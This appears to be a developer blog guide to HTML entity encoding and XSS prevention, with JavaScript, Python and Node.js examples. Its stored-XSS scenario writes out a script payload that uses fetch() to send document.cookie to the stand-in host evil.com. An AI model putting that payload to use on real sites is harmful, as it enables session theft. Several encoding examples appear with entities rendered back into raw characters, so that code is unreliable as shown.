HTML Entity Encoder/Decoder: Complete Guide for Web Developers
HTML entities are special codes that represent characters with special meaning in HTML — like <, >, &, and ". Encoding them correctly is essential for both correctness and security.
Try the DevPlaybook HTML Entity Encoder →
What Are HTML Entities?
HTML entities are string representations of characters that would otherwise be interpreted as HTML markup. They start with & and end with ;.
<!-- Without encoding — browser parses as HTML tag -->
<p>The formula is: a < b && b > c</p> <!-- Broken! -->
<!-- With encoding — renders correctly -->
<p>The formula is: a < b && b > c</p>
Common HTML Entities Reference
| Character | Entity Name | Entity Number | Use Case |
|---|---|---|---|
< |
< |
< |
Less-than sign, opening tag |
> |
> |
> |
Greater-than sign, closing tag |
& |
& |
& |
Ampersand |
" |
" |
" |
Double quote in attribute values |
' |
' |
' |
Single quote / apostrophe |
|
|
  |
Non-breaking space |
© |
© |
© |
Copyright symbol |
® |
® |
® |
Registered trademark |
™ |
™ |
™ |
Trademark symbol |
€ |
€ |
€ |
Euro sign |
→ |
→ |
→ |
Right arrow |
— |
— |
— |
Em dash |
When to Encode HTML
User-generated content: Any text from users (comments, names, bios) must be HTML-encoded before inserting into the DOM. Failing to do this opens you up to XSS (Cross-Site Scripting) attacks.
Dynamic content in templates: When inserting dynamic values into HTML templates, always encode unless you explicitly want to allow HTML markup.
Code examples in documentation: Showing code samples with <, >, or & characters in HTML requires entity encoding.
Emails (HTML): HTML emails should encode special characters in content to avoid rendering issues across email clients.
HTML Encoding in JavaScript
// Encode HTML — safe for inserting untrusted content
function encodeHTML(str) {
const div = document.createElement('div');
div.textContent = str; // Automatically encodes
return div.innerHTML;
}
// Or manually:
function escapeHTML(str) {
return str
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''');
}
// Usage
const userInput = '<script>alert("xss")</script>';
const safe = escapeHTML(userInput);
document.getElementById('output').innerHTML = safe;
// Displays literal text, doesn't execute script
Decoding HTML Entities in JavaScript
function decodeHTML(str) {
const div = document.createElement('div');
div.innerHTML = str;
return div.textContent || div.innerText;
}
decodeHTML('<b>Bold</b>');
// Returns: '<b>Bold</b>'
HTML Encoding in Python
import html
# Encode
text = '<script>alert("xss")</script>'
safe = html.escape(text)
print(safe)
# <script>alert("xss")</script>
# Encode with quote=False (doesn't escape quotes — use in text nodes only)
html.escape(text, quote=False)
# Decode
encoded = '<b>Hello & world</b>'
decoded = html.unescape(encoded)
print(decoded)
# <b>Hello & world</b>
HTML Encoding in Node.js
// Using the 'he' library (highly recommended)
// npm install he
const he = require('he');
// Encode
he.encode('<p>Hello & "world"</p>');
// '<p>Hello & "world"</p>'
// Decode
he.decode('<p>Hello</p>');
// '<p>Hello</p>'
// The 'he' library handles all named + numeric entities correctly
Security: HTML Encoding and XSS Prevention
HTML encoding is your first line of defense against Cross-Site Scripting (XSS) attacks.
Stored XSS scenario:
1. Attacker submits: <script>fetch('https://evil.com?cookie='+document.cookie)</script>
2. App stores raw text in database
3. App renders without encoding: innerHTML = rawValue
4. Every user who views the page runs the attacker's script
Prevention:
// UNSAFE — direct innerHTML with user content
element.innerHTML = userComment; // ❌ XSS vulnerability
// SAFE — textContent or encoded innerHTML
element.textContent = userComment; // ✅ Auto-encodes
element.innerHTML = escapeHTML(userComment); // ✅ Manually encoded
React's automatic escaping:
React JSX escapes all values by default, so <p>{userInput}</p> is safe. The dangerouslySetInnerHTML prop bypasses this — use it only with sanitized content.
Numeric vs Named Entities
HTML supports two entity formats:
<!-- Named entity (more readable) -->
© < &
<!-- Numeric decimal entity -->
© < &
<!-- Numeric hexadecimal entity -->
© < &
All three represent the same characters. Named entities are preferred for readability. Numeric entities work for any Unicode character.
When to Use
(non-breaking space) prevents a line break between two words. Use it sparingly:
<!-- Keep "10 AM" from breaking across lines -->
Meeting at 10 AM
<!-- Keep a number and its unit together -->
Distance: 42 km
<!-- Avoid using for layout spacing — use CSS padding/margin instead -->
Tools for HTML Entity Encoding
Browser-based: DevPlaybook HTML Entity Encoder — paste text and get encoded output instantly.
CLI:
# Python one-liner
python3 -c "import html, sys; print(html.escape(sys.stdin.read()))"
# Pipe file content
cat input.txt | python3 -c "import html, sys; print(html.escape(sys.stdin.read()))"
npm package:
npm install -g he
echo '<b>Hello</b>' | he --encode
Conclusion
HTML entity encoding is fundamental to web security and correctness. Always encode user-generated content before inserting it into HTML. Use a JSON-aware approach when encoding is needed programmatically, and rely on framework-level escaping (React, Vue, Angular) whenever possible.
Level Up Your Dev Workflow
Found this useful? Explore DevPlaybook — cheat sheets, tool comparisons, and hands-on guides for modern developers.
🛒 Get the DevToolkit Starter Kit on Gumroad — 40+ browser-based dev tools, source code + deployment guide included.
Top comments (0)